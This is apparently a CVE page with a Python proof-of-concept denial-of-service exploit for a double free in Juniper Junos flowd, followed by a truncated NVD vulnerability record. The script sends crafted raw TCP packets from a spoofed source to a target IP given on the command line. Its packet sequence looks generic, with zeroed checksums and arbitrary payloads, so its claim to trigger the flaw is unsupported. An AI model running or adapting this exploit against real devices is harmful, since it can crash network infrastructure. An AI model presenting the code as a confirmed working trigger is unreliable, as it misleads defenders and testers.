CVE-2026-21918

# CVE-2026-21918 PoC - Double Free in Juniper Junos flowd # This PoC demonstrates sending specific TCP packet sequence to trigger the vulnerability # Note: This is for educational and authorized testing purposes only import sys import socket import struct import time def craft_tcp_packet(src_ip, dst_ip, src_port, dst_port, seq, flags, payload=b''): """Craft a TCP packet with custom flags and sequence number""" # IP Header ip_header = struct.pack('!BBHHHBBH4s4s', 0x45, # Version 4, IHL 5 0x00, # TOS 20 + 20 + len(payload), # Total Length 0x0000, # Identification 0x4000, # Flags + Fragment Offset (Don't Fragment) 64, # TTL 6, # Protocol (TCP) 0x0000, # Checksum (placeholder) socket.inet_aton(src_ip), socket.inet_aton(dst_ip) ) # TCP Header tcp_header = struct.pack('!HHLLBBHHH', src_port, # Source Port dst_port, # Destination Port seq, # Sequence Number 0, # Acknowledgment Number 0x50, # Data Offset (5 * 4 = 20 bytes) flags, # Flags 65535, # Window Size 0x0000, # Checksum (placeholder) 0x0000 # Urgent Pointer ) return ip_header + tcp_header + payload def exploit_cve_2026_21918(target_ip, target_port=443): """ Attempt to trigger the Double Free vulnerability This sends a specific sequence of TCP packets during session establishment """ src_ip = '192.168.1.100' src_port = 12345 print(f"[*] Starting CVE-2026-21918 exploitation attempt") print(f"[*] Target: {target_ip}:{target_port}") try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) sock.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) # Step 1: Send initial SYN with specific sequence print("[*] Step 1: Sending initial SYN...") syn_packet = craft_tcp_packet(src_ip, target_ip, src_port, target_port, 1000, 0x02) sock.sendto(syn_packet, (target_ip, 0)) time.sleep(0.1) # Step 2: Send specific packet sequence to trigger Double Free print("[*] Step 2: Sending trigger packet sequence...") for i in range(5): # Send packets with specific flags combination trigger_packet = craft_tcp_packet( src_ip, target_ip, src_port, target_port, 1000 + i, 0x18, # PSH|ACK flags b'\x00' * 20 # Malformed payload ) sock.sendto(trigger_packet, (target_ip, 0)) time.sleep(0.05) # Step 3: Send RST to force cleanup print("[*] Step 3: Sending RST...") rst_packet = craft_tcp_packet(src_ip, target_ip, src_port, target_port, 1010, 0x04) sock.sendto(rst_packet, (target_ip, 0)) print("[*] Packet sequence sent. Monitor target for flowd crash.") except Exception as e: print(f"[!] Error: {e}") return False return True if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 443 exploit_cve_2026_21918(target, port)

{"cve": {"id": "CVE-2026-21918", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:08.050", "lastModified": "2026-01-23T19:41:38.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Double Free vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on SRX and MX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). On all SRX and MX Series platforms, when during TCP session establishment a specific sequence of packets is encountered a double free happens. This causes flowd to crash and the respective FPC to restart.\n\n\n\n\n\nThis issue affects Junos OS on SRX and MX Series:\n\n\n\n * all versions before 22.4R3-S7,\n * 23.2 versions before 23.2R2-S3,\n * 23.4 versions before 23.4R2-S4,\n * 24.2 versions before 24.2R2."}, {"lang": "es", "value": "Una vulnerabilidad de doble liberación en el demonio de procesamiento de flujo (flowd) de Juniper Networks Junos OS en las series SRX y MX permite a un atacante no autenticado y basado en red causar una Denegación de Servicio (DoS). En todas las plataformas de las series SRX y MX, cuando durante el establecimiento de una sesión TCP se encuentra una secuencia específica de paquetes, ocurre una doble liberación. Esto provoca que flowd se bloquee y que el FPC respectivo se reinicie.\n\nEste problema afecta a Junos OS en las series SRX y MX:\n\n * todas las versiones anteriores a 22.4R3-S7,\n * versiones 23.2 anteriores a 23.2R2-S3,\n * versiones 23.4 anteriores a 23.4R2-S4,\n * versiones 24.2 anteriores a 24.2R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:X/RE:M/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.4", "matchCriteriaId": "57F66641-003B-49D6-A9B9-AB300CFE3C93"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:-:*:*:*:*:*:*", "matchCriteriaId": "1379EF30-AF04-4F98-8328-52A631F24737"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1:*:*:*:*:*:*", "matchCriteriaId": "28E42A41-7965-456B-B0AF-9D3229CE4D4C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s1:*:*:*:*:*:*", "matchCriteriaId": "CB1A77D6-D3AD-481B-979C-8F778530B175"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r1-s2:*:*:*:*:*:*", "matchCriteriaId": "3A064B6B-A99B-4D8D-A62D-B00C7870BC30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2:*:*:*:*:*:*", "matchCriteriaId": "40813417-A938-4F74-A419-8C5188A35486"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2-s1:*:*:*:*:*:*", "matchCriteriaId": "7FC1BA1A-DF0E-4B15-86BA-24C60E546732"}, {"vulnerable": true, "criteria": "cpe:2.3:o:juniper:junos:22.4:r2-s2:*:*:*:*:*:*", "matchCriteriaId": "EBB967BF-3495-476D-839A-9 ... (truncated)